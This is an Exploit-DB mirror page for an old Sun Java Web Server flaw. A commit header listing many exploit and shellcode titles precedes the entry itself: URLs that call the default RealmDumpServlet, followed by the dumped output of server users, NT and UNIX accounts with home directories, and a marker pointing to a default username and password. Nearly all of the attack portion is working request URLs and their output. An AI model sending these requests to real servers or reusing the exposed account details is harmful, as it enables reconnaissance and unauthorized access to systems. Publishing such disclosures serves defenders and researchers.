exploit-db-mirror/exploits/multiple/remote/20095.txt
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

136 lines
No EOL
2.2 KiB
Text

source: https://www.securityfocus.com/bid/1498/info
The servlet sunexamples.RealmDumpServlet, which is packaged by Default with Sun's Java Web Server, can be used to discover ACLs and local users on the server.
http://javawebserver.com/pservlet.html
User: sherwin
User: floorsoft
User: shaw
User: sears
User: beaulieu
User: diyonline
User: chicken
User: homedepot
User: abbey
User: goodhome
User: design1
User: 121312
User: buildnet
User: lowes
User: admin
User: emmitt
User: tms
User: ifloor
User: jeeves
^-------------------- default user / pass for web server
User: gerald
User: dixie
User: homeportfolio
User: buildscape
User: chuck
http://javawebserver/servlet/sunexamples.RealmDumpServlet
http://javawebserver:8080/servlet/sunexamples.RealmDumpServlet#Realm-NT
Individual Users:
User: brianw, home = \\aussie\home\brianw
User: chabell, home = \\aussie\home\chabell
User: davisons, home = \\aussie\home\davisons
User: exchadmin, home =
User: IUSR_AUSSIE, home =
User: IWAM_AUSSIE, home =
User: jd, home = \\aussie\home\jd
User: kkl, home = \\aussie\home\kkl
User: lisamh, home = \\aussie\home\lisamh
User: mattix, home = \\aussie\home\mattix
User: maxadmin, home = \\aussie\home\maxadmin
User: maxdev, home = \\aussie\home\maxdev
User: maxguest, home =
User: mcgreer, home = \\aussie\home\mcgreer
User: mdavis, home = \\aussie\home\mdavis
User: nbrathod, home = \\aussie\home\nbrathod
User: prnees, home = \\aussie\home\prnees
User: renee, home = \\aussie\home\renee
User: smcelder, home = \\aussie\home\smcelder
User: SQLAgentCmdExec, home = H:
http://javawebserver/servlet/sunexamples.RealmDumpServlet#Users-UNIX
Individual Users:
User: root, home = /
User: daemon, home = /
User: bin, home = /usr/bin
User: sys, home = /
User: adm, home = /var/adm
User: lp, home = /usr/spool/lp
User: uucp, home = /usr/lib/uucp
User: nuucp, home = /var/spool/uucppublic
User: listen, home = /usr/net/nls
User: nobody, home = /
User: noaccess, home = /
User: nobody4, home = /
User: mc, home = /space/u/mc